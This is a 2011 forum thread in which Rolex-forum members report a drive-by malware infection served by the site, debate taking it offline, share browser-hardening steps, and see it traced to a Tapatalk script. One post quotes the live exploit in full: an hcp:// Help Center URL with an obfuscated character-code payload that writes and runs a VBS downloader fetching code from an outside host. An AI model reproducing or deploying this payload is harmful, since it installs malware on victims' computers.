ROLEXROLEXROLEXROLEXROLEXROLEXROLEXROLEXROLEXROLEXROLEXROLEX

gregmoeck · 10 December 2011, 11:37 AM

sorry if i came off harsh, i know its tough to fix these server side issues, hang in there

Mickey® · 10 December 2011, 11:41 AM

Quote:

Originally Posted by gregmoeck

damn microsoft, i use linux downstairs and never have a problem. i come upstairs and use my windows netbook and now its infected. microsoft security essentials just cleaned exploit:JS/Blacloe.AC which I got from this forum. You should shut down the forum until issue is fixed to prevent others from getting thier home pc's compromised. Leaving this up all day probably infected a ton of workstations across the globe.

I'm on a Google Chrome Operating system Laptop...So it isn't Microsoft exactly...

dsio · 10 December 2011, 11:44 AM

Quote:

Originally Posted by gregmoeck

damn microsoft, i use linux downstairs and never have a problem. i come upstairs and use my windows netbook and now its infected. microsoft security essentials just cleaned exploit:JS/Blacloe.AC which I got from this forum. You should shut down the forum until issue is fixed to prevent others from getting thier home pc's compromised. Leaving this up all day probably infected a ton of workstations across the globe.

This is absolutely correct...

The reason you're only getting 15% of users reporting it is that you have a lot of people running unsophisticated or older browsers like IE on this forum. There is a block of javascript code attempting to pull down a malware payload on every pageload on TRF.

You need to kill apache and point nginx to a holding page until this is over, every minute you try to keep the site up in its present state is doing damage to TRF users.

77T · 10 December 2011, 11:47 AM

BTW a new exploit has surfaced to attack iPads running Safari. It just causes an overflow since the Java Trojan won't download to an iPad.

Just sharing in the spirit of teamwork.

iPads and iPhones running Tapatalk seem to still be fine. Have been using both with no problems

But I tried the iPad with Safari just to check. It ran for several minutes before picking up the probe and then it would just close Safari as the redirect tried to load the jar files.

Sent from my iPad using Tapatalk

LordNinja · 10 December 2011, 11:49 AM

I thought so. Hmmm

Quote:

Originally Posted by gregmoeck

sql database injection or some infection, passwords may be compromised, here is what i get now.

hcp://services/search?query=anything&topic=hcp://system/sysinfo/sysinfomain.htm%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%% A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A% %A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%% A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A. .%5C..%5Csysinfomain.htm%u003fsvr=<script defer>eval(Run(String.fromCharCode(99,109,100,32,4 7,99,32,101,99,104,111,32,66,61,34,108,46,118,98,1 15,34,58,87,105,116,104,32,67,114,101,97,116,101,7 9,98,106,101,99,116,40,34,77,83,88,77,76,50,46,88, 77,76,72,84,84,80,34,41,58,46,111,112,101,110,32,3 4,71,69,84,34,44,34,104,116,116,112,58,47,47,111,1 14,101,105,110,111,101,107,115,111,110,121,46,99,1 11,109,47,99,111,110,116,101,110,116,47,104,99,112 ,95,118,98,115,46,112,104,112,63,102,61,50,54,38,1 00,61,49,34,44,102,97,108,115,101,58,46,115,101,11 0,100,40,41,58,83,101,116,32,65,32,61,32,67,114,10 1,97,116,101,79,98,106,101,99,116,40,34,83,99,114, 105,112,116,105,110,103,46,70,105,108,101,83,121,1 15,116,101,109,79,98,106,101,99,116,34,41,58,83,10 1,116,32,68,61,65,46,67,114,101,97,116,101,84,101, 120,116,70,105,108,101,40,65,46,71,101,116,83,112, 101,99,105,97,108,70,111,108,100,101,114,40,50,41, 32,43,32,34,92,34,32,43,32,66,41,58,68,46,87,114,1 05,116,101,76,105,110,101,32,46,114,101,115,112,11 1,110,115,101,84,101,120,116,58,69,110,100,32,87,1 05,116,104,58,68,46,67,108,111,115,101,58,67,114,1 01,97,116,101,79,98,106,101,99,116,40,34,87,83,99, 114,105,112,116,46,83,104,101,108,108,34,41,46,82, 117,110,32,65,46,71,101,116,83,112,101,99,105,97,1 08,70,111,108,100,101,114,40,50,41,32,43,32,34,92, 34,32,43,32,66,32,62,32,37,84,69,77,80,37,92,92,10 8,46,118,98,115,32,38,38,32,37,84,69,77,80,37,92,9 2,108,46,118,98,115,32,38,38,32,116,97,115,107,107 ,105,108,108,32,47,70,32,47,73,77,32,104,101,108,1 12,99,116,114,46,101,120,101)));</script>

LordNinja · 10 December 2011, 11:51 AM

Quote:

Originally Posted by dsio

This is absolutely correct...

The reason you're only getting 15% of users reporting it is that you have a lot of people running unsophisticated or older browsers like IE on this forum. There is a block of javascript code attempting to pull down a malware payload on every pageload on TRF.

You need to kill apache and point nginx to a holding page until this is over, every minute you try to keep the site up in its present state is doing damage to TRF users.

Sadly true.

LordNinja · 10 December 2011, 11:53 AM

Sounds like we have a lot of other experienced It/networking people finally chiming in.

LordNinja · 10 December 2011, 11:56 AM

I am prob not the only one that felt I would enrage an admin/mod with my concern. Glad this is such an open place.:)

It pains me to see the forum have any issues at all but it happens.

Rockrolex · 10 December 2011, 12:01 PM

Quote:

Originally Posted by Cru Jones

my message:

"Symantec Endpoint Protection - [SID: 24225] - Web Attack: Blackhole Toolkit Website 5 detected."

I've been getting the same message for the past couple of days. Norton 360 has been blocking the attacks.

sleddog · 10 December 2011, 12:06 PM

Quote:

Originally Posted by dsio

This is absolutely correct...

The reason you're only getting 15% of users reporting it is that you have a lot of people running unsophisticated or older browsers like IE on this forum. There is a block of javascript code attempting to pull down a malware payload on every pageload on TRF.

You need to kill apache and point nginx to a holding page until this is over, every minute you try to keep the site up in its present state is doing damage to TRF users.

Thanks for the point of view Ashley.
What I can suggest ATM is to up your firewall/and or loggout from the forum until this issue is resolved.
Personal commitments and an ongoing search for the source are persistent

Quote:

Originally Posted by LordNinja

I am prob not the only one that felt I would enrage an admin/mod with my concern. Glad this is such an open place.:)

It pains me to see the forum have any issues at all but it happens.

The current position is, if you are having Malicious attacks, position your firewall appropriately....
This will be resolved in due time, rest assured!

Grissom · 10 December 2011, 12:25 PM

I have been browsing with safari via my iPhone with no apparent issues so far.

While I hate to be without TRF for even a few minutes I also would be supportive of TRF being taken offline in order to clean things up so that those with less sophisticated or secure systems would not be unwittingly infected.

Many thanks to Steve, et al, for working towards a speedy resolution

Rockrolex · 10 December 2011, 12:35 PM

I use IE with Verizon Yahoo as my browser on XP machines. I have no problem accessing TRF. The only issue I've had in the past two days was noted in post #129 above.

When I browse for Rolex Forum in Yahoo, TRF comes up immediately with no issues.

However, when I did a similar search using Google, I got the following message:

Quote:

Warning - visiting this web site may harm your computer!

Suggestions:

<LI sb_id="ms__id745">Return to the previous page and pick another result.
Try another search to find what you're looking for.

Or you can continue to http://www.rolexforums.com/ at your own risk. For detailed information about the problems we found, visit Google's Safe Browsing diagnostic page for this site.

For more information about how to protect yourself from harmful software online, you can visit StopBadware.org.

If you are the owner of this web site, you can request a review of your site using Google's Webmaster Tools. More information about the review process is available in Google's Webmaster Help Center.
Advisory provided by

This may be a Google problem more than a TRF problem.

Freelance · 10 December 2011, 12:52 PM

Quote:

Originally Posted by sleddog

Thanks for the point of view Ashley.
What I can suggest ATM is to up your firewall/and or loggout from the forum until this issue is resolved.
Personal commitments and an ongoing search for the source are persistent

The current position is, if you are having Malicious attacks, position your firewall appropriately....
This will be resolved in due time, rest assured!

Please do not take this the wrong way, but this is wrong and irresponsible.

I purposely and carefully surfed here using Firefox with the "noscript plugin" (forbidding rolexforums.com, and links) and java turned off.

"position your firewall appropriately" ??? Sorry, but firewalls DO NOT prevent drive by downloads. As long as you keep this site operational you ARE contributing to the possible infection of older, unpatched machines. (I pity the person who is surfing this forum with IE6).

The culprit could be hiding anywhere from "signatures" to "avatars", hidden iFrames.

As suggested, the site should be taken offline, or DNS pointed to a "Sorry" page.

dsio · 10 December 2011, 01:01 PM

Quote:

Originally Posted by Freelance

Please do not take this the wrong way, but this is wrong and irresponsible.

I purposely and carefully surfed here using Firefox with the "noscript plugin" (forbidding rolexforums.com, and links) and java turned off.

"position your firewall appropriately" ??? Sorry, but firewalls DO NOT prevent drive by downloads. As long as you keep this site operational you ARE contributing to the possible infection of older, unpatched machines. (I pity the person who is surfing this forum with IE6).

The culprit could be hiding anywhere from "signatures" to "avatars", hidden iFrames.

As suggested, the site should be taken offline, or DNS pointed to a "Sorry" page.

If you go to view source you can see exactly where its being loaded, check on any page and do a find for "d.write", its where a heap of banners for watch top 100 lists used to be at the bottom of every page.

sleddog · 10 December 2011, 01:11 PM

Quote:

Originally Posted by Freelance

Please do not take this the wrong way, but this is wrong and irresponsible.

I purposely and carefully surfed here using Firefox with the "noscript plugin" (forbidding rolexforums.com, and links) and java turned off.

"position your firewall appropriately" ??? Sorry, but firewalls DO NOT prevent drive by downloads. As long as you keep this site operational you ARE contributing to the possible infection of older, unpatched machines. (I pity the person who is surfing this forum with IE6).

The culprit could be hiding anywhere from "signatures" to "avatars", hidden iFrames.

As suggested, the site should be taken offline, or DNS pointed to a "Sorry" page.

This is not taken in "the wrong way".
My advice to you and anyone else receiving the warnings, is "to log out"!!!!

TRF is not holding you hostage to log in, nor is it doing nothing!!

All i'm asking is to keep the antagonism to yourself until the fix has been resolved!
There's more to it than you can see or fathom.

My post was an alternative, not a directive!!

Lol-x · 10 December 2011, 04:02 PM

Please be patient guys we are working on getting this resolved asap.

I hope the solution will be obtained shortly.

Please accept my apologies.

I do not have any evidence of compromised accounts or computers at this stage, it may be a false positive, but it is best to err on the side of caution.

2careless · 10 December 2011, 06:27 PM

Until there is a fix to the problem, it seems to me that by disabling scripting will disable the access of the malware.

In IE, this can be done by changing the security level of the browser:
1. Goto "Tools" -> "Internet Options", and select the "Security" tab
2. Select "Internet zone", tick "Enabled Protected Mode", select "Custom Level"
3. Scroll down the Settings to "Scripting" section:
4. Right under "Scripting", there is "Active scripting", either check Disable, or Prompt. Then click "OK" and "OK" to get out.
By choosing "Disable", some website may break, You can choose "Prompt" and make sure you say "no" in TRF.

In Firefox, it's easier:
1. goto "Tools" -> "Options"
2. goto "Content" tab at the top.
3. uncheck "Enable Javascript".

Hope this helps.

P.S. If you google "Disable Javascript in IE", there are several answers that contains malware by itself. Be careful!

Lol-x · 11 December 2011, 12:40 PM

The problem has been resolved.
It was related to a Tapatalk script.
Tapatalk has not been reinstalled at this stage.

The google warning takes a day to remove, but everything is running properly as of now.

STEELINOX · 11 December 2011, 12:46 PM

Quote:

Originally Posted by Lol-x

The problem has been resolved.
It was related to a Tapatalk script.
Tapatalk has not been reinstalled at this stage.

The google warning takes a day to remove, but everything is running properly as of now.

Great news StevO !

10 December 2011, 11:47 AM	#124
77T 2024 ROLEX DATEJUST41 Pledge Member Join Date: Dec 2010 Real Name: PaulG Location: Georgia Posts: 40,791	BTW a new exploit has surfaced to attack iPads running Safari. It just causes an overflow since the Java Trojan won't download to an iPad. Just sharing in the spirit of teamwork. iPads and iPhones running Tapatalk seem to still be fine. Have been using both with no problems But I tried the iPad with Safari just to check. It ran for several minutes before picking up the probe and then it would just close Safari as the redirect tried to load the jar files. Sent from my iPad using Tapatalk __________________ Does anyone really know what time it is?

10 December 2011, 12:25 PM	#131
Grissom "TRF" Member Join Date: Oct 2010 Real Name: Nathan Location: US, Latin America Watch: GMT IIc 18K/SS Posts: 3,349	I have been browsing with safari via my iPhone with no apparent issues so far. While I hate to be without TRF for even a few minutes I also would be supportive of TRF being taken offline in order to clean things up so that those with less sophisticated or secure systems would not be unwittingly infected. Many thanks to Steve, et al, for working towards a speedy resolution __________________ *(Member NAWCC since 1976)* 116713LN GMT-IIc 18k/SS (Z) + 116520 SS Daytona (M) + 16700 GMT Master (A) + 16610LV Submariner (V) + 16600 Sea Dweller (Z) + 116400 Milgauss White Dial (V) + 70330N Tudor Heritage Chronograph Grey w/Black Sub Dials (J) + 5513 Submariner Serif Dial (5.2 Mil) Who else needs an Intervention? (109 297) (137 237) (73 115) (221) (23) (56) (229) P-Club Member #5 RIP JJ Irani - TRF Legend

10 December 2011, 04:02 PM	#136
Lol-x Facilitator Join Date: Nov 2005 Real Name: Steve Location: Omnipresent Posts: 33,255	Please be patient guys we are working on getting this resolved asap. I hope the solution will be obtained shortly. Please accept my apologies. I do not have any evidence of compromised accounts or computers at this stage, it may be a false positive, but it is best to err on the side of caution. __________________ *Most folks are about as happy as they make up their minds to be.* ~Abraham Lincoln Nothing compares to the simple pleasure of a bike ride. ~John F. Kennedy ROLEXploitation - yeah I'm a victim

11 December 2011, 12:40 PM	#138
Lol-x Facilitator Join Date: Nov 2005 Real Name: Steve Location: Omnipresent Posts: 33,255	The problem has been resolved. It was related to a Tapatalk script. Tapatalk has not been reinstalled at this stage. The google warning takes a day to remove, but everything is running properly as of now. __________________ *Most folks are about as happy as they make up their minds to be.* ~Abraham Lincoln Nothing compares to the simple pleasure of a bike ride. ~John F. Kennedy ROLEXploitation - yeah I'm a victim

10 December 2011, 11:37 AM	#121
gregmoeck "TRF" Member Join Date: Mar 2010 Location: Maui Watch: Patek Posts: 2,032	sorry if i came off harsh, i know its tough to fix these server side issues, hang in there

10 December 2011, 11:53 AM	#127
LordNinja "TRF" Member Join Date: Aug 2008 Real Name: Chris Location: Boston Watch: 116610,116233,OsQz Posts: 1,109	Sounds like we have a lot of other experienced It/networking people finally chiming in.

10 December 2011, 11:56 AM	#128
LordNinja "TRF" Member Join Date: Aug 2008 Real Name: Chris Location: Boston Watch: 116610,116233,OsQz Posts: 1,109	I am prob not the only one that felt I would enrage an admin/mod with my concern. Glad this is such an open place.:) It pains me to see the forum have any issues at all but it happens.

10 December 2011, 06:27 PM	#137
2careless "TRF" Member Join Date: Dec 2007 Location: Melbourne, AU Watch: Pepsi Posts: 4,370	Until there is a fix to the problem, it seems to me that by disabling scripting will disable the access of the malware. In IE, this can be done by changing the security level of the browser: 1. Goto "Tools" -> "Internet Options", and select the "Security" tab 2. Select "Internet zone", tick "Enabled Protected Mode", select "Custom Level" 3. Scroll down the Settings to "Scripting" section: 4. Right under "Scripting", there is "Active scripting", either check Disable, or Prompt. Then click "OK" and "OK" to get out. By choosing "Disable", some website may break, You can choose "Prompt" and make sure you say "no" in TRF. In Firefox, it's easier: 1. goto "Tools" -> "Options" 2. goto "Content" tab at the top. 3. uncheck "Enable Javascript". Hope this helps. P.S. If you google "Disable Javascript in IE", there are several answers that contains malware by itself. Be careful!

Currently Active Users Viewing This Thread: 1 (0 members and 1 guests)